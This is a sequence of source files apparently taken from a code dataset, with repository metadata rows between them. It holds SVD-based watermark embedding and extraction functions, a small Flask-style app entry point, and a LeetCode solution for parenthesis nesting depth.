    mat_s_matrix = np.pad(np.diag(mat_s),
        [(0, mat_rows - mat_num_sv), (0, mat_columns - mat_num_sv)])

    # Zero-pad the watermark up to A's shape before taking its SVD.
    watermark_padded = np.pad(watermark,
        [(0, mat_rows - watermark_rows), (0, mat_columns - watermark_columns)])
    watermark_u, watermark_s, watermark_vh = la.svd(watermark_padded)
    watermark_num_sv = len(watermark_s)
    # The padded watermark has A's shape, so its singular-value matrix is
    # padded to (mat_rows, mat_columns) as well.  (The previous version
    # re-assigned watermark_rows/watermark_columns from mat.shape here, which
    # shadowed the watermark's own dimensions; the values are identical.)
    watermark_s_matrix = np.pad(np.diag(watermark_s),
        [(0, mat_rows - watermark_num_sv), (0, mat_columns - watermark_num_sv)])

    # The watermark's principal components U_W * S_W perturb S.
    watermark_pcs = watermark_u @ watermark_s_matrix
    mat_s_matrix_watermarked = mat_s_matrix + scale * watermark_pcs
    mat_watermarked = mat_u @ mat_s_matrix_watermarked @ mat_vh

    if term:
        # The matrix added (scaled by alpha) to A, see Equation 3.1.
        jain_term = mat_u @ watermark_u @ watermark_s_matrix @ mat_vh
        return mat_watermarked, watermark_vh, jain_term
    return mat_watermarked, watermark_vh
def extract_watermark_jain(mat_watermarked, mat_original, watermark_vh, scale):
    r'''
    Extract a watermark from a matrix using the Jain watermarking scheme.
    Corresponds to Algorithm 2.5 in the paper.

    Args:
        mat_watermarked: The watermarked matrix (\widetilde{A}_W in Algorithm 2.5)
        mat_original: The original, unwatermarked matrix (A in Algorithm 2.4/2.5)
        watermark_vh: (V_W)^T from Algorithm 2.4/2.5 (watermark_vh from the
            return statement of embed_watermark_jain)
        scale: Scaling factor (alpha in Algorithm 2.4/2.5); must be nonzero

    Returns: The recovered image (\widetilde{W} in Algorithm 2.5)
    '''
    mat_u, mat_s, mat_vh = la.svd(mat_original)
    # U and V^H from the SVD are unitary, so their inverses are their conjugate
    # transposes; this replaces two explicit O(n^3) matrix inversions with
    # transposes and is numerically exact for unitary factors.
    watermark_pcs = (mat_u.conj().T @ (mat_watermarked - mat_original) @ mat_vh.conj().T) / scale
    return watermark_pcs @ watermark_vh
def embed_watermark_jain_mod(mat, watermark, scale=1, term=False):
    '''
    Embed a watermark in a matrix using the proposed modified Jain et al
    watermarking scheme. Corresponds to Algorithm 3.1 in the paper.

    Args:
        mat: The matrix in which to embed the watermark (A in Algorithm 3.1)
        watermark: The watermark to embed in the matrix (W in Algorithm 3.1);
            must be no larger than ``mat`` in either dimension
        scale: Scaling factor (alpha in Algorithm 3.1)
        term: Whether or not to also return the "Jain mod term" (the term added
            to A in Step 3 of Algorithm 3.1) in addition to the watermarked
            matrix and the key.

    Returns: (A_W, (V_W)^T, [Jain mod term as above if term==True])
        (corresponding to the symbols in Algorithm 3.1), or None if the
        watermark is too large.
    '''
    mat_rows, mat_columns = mat.shape
    watermark_rows, watermark_columns = watermark.shape
    if mat_rows < watermark_rows or mat_columns < watermark_columns:
        # Preserve the original best-effort behavior: report and return None.
        print('Watermark must be smaller than matrix')
        return
    # Only V^T of A is needed by this scheme (the original also built A's
    # singular-value matrix, which was dead code).
    mat_u, mat_s, mat_vh = la.svd(mat)
    # Zero-pad the watermark to A's shape so the decompositions are conformable.
    watermark_padded = np.pad(watermark,
                              [(0, mat_rows - watermark_rows), (0, mat_columns - watermark_columns)])
    watermark_u, watermark_s, watermark_vh = la.svd(watermark_padded)
    watermark_num_sv = len(watermark_s)
    # watermark_padded has A's shape, so its singular value matrix is
    # mat_rows x mat_columns.
    watermark_s_matrix = np.pad(np.diag(watermark_s),
                                [(0, mat_rows - watermark_num_sv), (0, mat_columns - watermark_num_sv)])
    # Step 3 of Algorithm 3.1: A_W = A + alpha * U_W S_W V^T.
    jain_mod_term = watermark_u @ watermark_s_matrix @ mat_vh
    mat_watermarked = mat + scale * jain_mod_term
    # (The original had a second, unreachable copy of this return statement.)
    if term:
        return mat_watermarked, watermark_vh, jain_mod_term
    return mat_watermarked, watermark_vh
def extract_watermark_jain_mod(mat_watermarked, mat_original, watermark_vh, scale):
    r'''
    Extract a watermark from a matrix using the proposed modified Jain
    watermarking scheme. Corresponds to Algorithm 3.2 in the paper.

    Args:
        mat_watermarked: The watermarked matrix (\widetilde{A}_W in Algorithm 3.1)
        mat_original: The original, unwatermarked matrix (A in Algorithm 3.1/3.2)
        watermark_vh: (V_W)^T from Algorithm 3.1/3.2 (watermark_vh from the
            return statement of embed_watermark_jain_mod)
        scale: Scaling factor (alpha in Algorithm 3.1/3.2); must be nonzero

    Returns: The recovered image (\widetilde{W} in Algorithm 3.2)
    '''
    # Only V^T of the original matrix is needed.
    mat_u, mat_s, mat_vh = la.svd(mat_original)
    # V^H is unitary, so inv(V^H) == (V^H).conj().T; using the conjugate
    # transpose avoids an explicit O(n^3) inversion and is numerically exact.
    return (mat_watermarked - mat_original) @ mat_vh.conj().T @ watermark_vh / scale
| 45.589744 | 163 | 0.713611 |
8e8ba19e85c168b8587f25848ffa7f4748858d55 | 264 | py | Python | hale_hub/entry_points.py | tantinlala/hale-hub | da2e6d24e3869ee533d2e272ce87b9e7eede9a79 | [
"MIT"
] | null | null | null | hale_hub/entry_points.py | tantinlala/hale-hub | da2e6d24e3869ee533d2e272ce87b9e7eede9a79 | [
"MIT"
] | null | null | null | hale_hub/entry_points.py | tantinlala/hale-hub | da2e6d24e3869ee533d2e272ce87b9e7eede9a79 | [
"MIT"
] | null | null | null | from hale_hub import create_app
from hale_hub.extensions import db
def hale_hub_run():
app = create_app()
app.run(host='0.0.0.0')
def hale_hub_setup():
app = create_app()
with app.app_context():
db.init_app(app)
db.create_all()
| 17.6 | 34 | 0.655303 |
c0831719df66f55a069b5f3626ffca4586cb1758 | 334 | py | Python | solutions/1614_maximum_nesting_depth_of_the_parentheses.py | YiqunPeng/leetcode_pro | 7e6376984f9baec49a5e827d98330fe3d1b656f0 | [
"MIT"
] | null | null | null | solutions/1614_maximum_nesting_depth_of_the_parentheses.py | YiqunPeng/leetcode_pro | 7e6376984f9baec49a5e827d98330fe3d1b656f0 | [
"MIT"
] | null | null | null | solutions/1614_maximum_nesting_depth_of_the_parentheses.py | YiqunPeng/leetcode_pro | 7e6376984f9baec49a5e827d98330fe3d1b656f0 | [
"MIT"
] | null | null | null | class Solution:
def maxDepth(self, s: str) -> int:
"""String.
Running time: O(n) where n == len(s).
"""
res = 0
n = 0
for i in s:
if i == '(':
n += 1
res = max(res, n)
elif i == ')':
n -= 1
return res
| 20.875 | 45 | 0.323353 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.